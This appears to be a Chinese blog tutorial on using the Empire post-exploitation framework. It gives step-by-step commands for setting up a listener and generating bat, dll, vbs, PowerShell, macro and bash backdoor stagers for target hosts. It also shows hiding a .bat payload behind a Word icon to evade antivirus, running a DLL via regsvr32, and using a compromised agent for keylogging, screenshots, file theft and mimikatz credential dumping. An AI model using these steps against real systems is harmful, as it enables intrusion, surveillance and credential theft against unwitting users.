Empire内网渗透工具简单使用

工具介绍

Empire是一款强大的Powershell脚本利用框架,类似于MSF渗透利用框架,只不过它是由Powershell脚本组成的,无需Powershell环境,木马后门生成、内网扫描、漏洞探测、漏洞利用、提权等功能,功能强大是一款优秀的后渗透利用框架,是Windows内网渗透中的一件大杀器。

下载地址

https://github.com/EmpireProject/Empire.git

功能介绍

在这里插入图片描述

设置监听

其实与Metasploit一样都是开始需要设置一个监听,设置一个payload的木马,主机运行后门木马返回一个session。

Listeners
进入监听
在这里插入图片描述

uselisteners
选择监听方式

Dbx 
http_com
http_hop
meterpreter
redirector    
http
http_foreign
http_mapi
onedrive

在这里插入图片描述
选择http监听方式
在这里插入图片描述
Info一下看一下设置参数
在这里插入图片描述
设置一个监听“hack”

Set name hack  #设置监听名称
Set name x.x.x.x:xx  #设置本地监听IP和端口
Back返回上级
List已设置的监听

在这里插入图片描述
Delete 监听名 就能删除监听
在这里插入图片描述

生成木马后门

Empire与metasploit一样在设置晚监听参数后,需要生成一个木门后门文件,上传到目标机器上执行。
与metasploit同出可以设置不同的监听载荷和攻击载荷,Empire是多模块化的stager

**Usestager**
Usestager stager类型  #设置stager(payload)类型

multi/bash                
multi/launcher            
multi/macro               
multi/pyinstaller         
multi/war            	

#以上为通用型后门  
osx/applescript           
osx/application                            
osx/dylib
osx/ducky                 
osx/jar                   
osx/launcher              
osx/macho                 
osx/macro                
osx/pkg                   r       
osx/teensy                
osx/safari_launche

#以上为mac OS后门
windows/backdoorLnkMacro
windows/bunny
windows/csharp_exe
windows/dll
windows/ducky
windows/hta
windows/launcher_bat
windows/launcher_lnk
windows/launcher_sct
windows/launcher_vbs
windows/launcher_xml
windows/macro
windows/macroless_msword
windows/shellcode
windows/teensy

#以上为windows后门

在这里插入图片描述

下面以window、linux常用的几种木马文件示例

1、Windows launcher_bat批处理脚本木马

usestager windows/launcher_bat  #选择木马类型
info  #查看设置参数选项

在这里插入图片描述

set Listener hack  #设置刚才监听的hack
execute  #执行生成文件launcher_bat

在这里插入图片描述
在这里插入图片描述
上传到目标主机上,执行返回一个agent,成功上线
在这里插入图片描述
伪装一下.bat文件,由于容易被杀毒软件拦截,可以利用word office文件将.bat
选择“对象”-“由文件创建”-选择“由文件创建”-“显示图标”-“更改图标”。
在这里插入图片描述
当目标用户点击该.doc文件并执行时,成功上线。
在这里插入图片描述
在这里插入图片描述

2、Windows dll动态链接文件木马

usestager windows/dll  #选择木马类型
info  #查看设置参数选项

在这里插入图片描述

set Listener hack  #设置刚才监听的hack
execute  #执行生成文件launcher.dll

在这里插入图片描述
将dll文件上传到目标主机,通过打开运行-输入“regsvr32+空格+dll所在目录+dll文件”,正常的话执行完dll可以上线的 ,但进程是有的。
在这里插入图片描述

3、Windows launcher_vbs 脚本木马

usestager windows/launcher_vbs  #选择木马类型
info  #查看设置参数选项
set Listener hack  #设置刚才监听的hack
execute  #执行生成文件launcher_vbs

在这里插入图片描述
上传到目标主机上,执行返回一个agent,成功上线
在这里插入图片描述

4、Windows powershell payload脚本上线

usestager windows/launcher_bat  #选择木马类型
info  #查看设置参数选项
set Listener hack #设置一个监听
back #返回listenner
launcher powershell hack #生成一个以powershell为准的shellcode
将生成的payload复制到目标机上运行,返回一个agents

在这里插入图片描述
上传到目标主机上,执行返回一个agent,成功上线
在这里插入图片描述

5、Windows macro(office宏)木马

usestager windows/macro  #选择木马类型
info  #查看设置参数选项
set Listener hack  #设置刚才监听的hack
execute  #执行生成一个宏文件木马

在这里插入图片描述
在这里插入图片描述
编辑创建宏文件,选择“视图”-“宏”-“查看宏”

在这里插入图片描述
随便起一个宏的名字,选择.docx文档,弹出一个vb编辑对话框,将原有的vbs脚本替换成为macro文件的脚本。

在这里插入图片描述
在这里插入图片描述
复制完成后点击“保存”弹出对话框
在这里插入图片描述

选择“Word 97-2003”保存类型
在这里插入图片描述
点击“启用内容”成功上线
在这里插入图片描述

6、linux bash payload脚本上线

usestager multi/bash  #选择木马类型
info  #查看设置参数选项
set Listener hack  #设置一个监听
execute #生成一个以bash脚本为准的shellcode
将生成的payload复制到目标机上运行,返回一个agents

在这里插入图片描述
上传到目标主机上运行,执行返回一个agent,成功上线
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Agent上线

当设置完监听和木马后门生成后在目标主机执行完后门后就会上线一个agent,也就和metasploit返回的session一样,agents可以看到上线的主机,name那一列相当于metaspolit的session id一样,Username如果主机前面有小*就代表提权成功了。
在这里插入图片描述

Interact 切换agents

Interact sessionID 切换session

在这里插入图片描述

常用参数

Info可以看到目标受控机的agent信息

在这里插入图片描述
Sysinfo可以看到受控主机的系统信息
在这里插入图片描述
Searchmoudule 模块名,与metasploti同出都可以搜索相应模块
在这里插入图片描述
Usemoudle 模块名切换,切换相应模块
在这里插入图片描述
Shell 命令,shell后面是跟着相应主机命令操作
在这里插入图片描述
Upload 文件名,可以将文件上传到目标主机
在这里插入图片描述
在这里插入图片描述
Download 可以下载受控主机文件,将文件保存到
在这里插入图片描述
在这里插入图片描述
Sc 命令也可以截取主机屏幕
在这里插入图片描述

Jobs显示键盘记录的进程
Jobs kill 杀掉键盘记录进程

在Access.log下可以看到对操作的记录
在这里插入图片描述
键盘记录keylogger

Usemoudle collection/keylogger

在这里插入图片描述
当输入时就会有记录
在这里插入图片描述
在提权完成可以调用mimikatz
在这里插入图片描述
Creds命令可以查看获取到的密码
在这里插入图片描述
本章节就简单介绍了一下Empire的基本使用方式和常见命令,下一章节中会介绍使用Empire常见的扫描和提权的使用。

参考文献

https://github.com/EmpireProject/Empire
https://item.jd.com/12743210.html?cu=true&utm_source=www.dushu.com&utm_medium=tuiguang&utm_campaign=t_1000254658_&utm_term=8cd27199e5284c17b1ab686439ccbd0a
https://cloud.tencent.com/developer/article/1038501
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值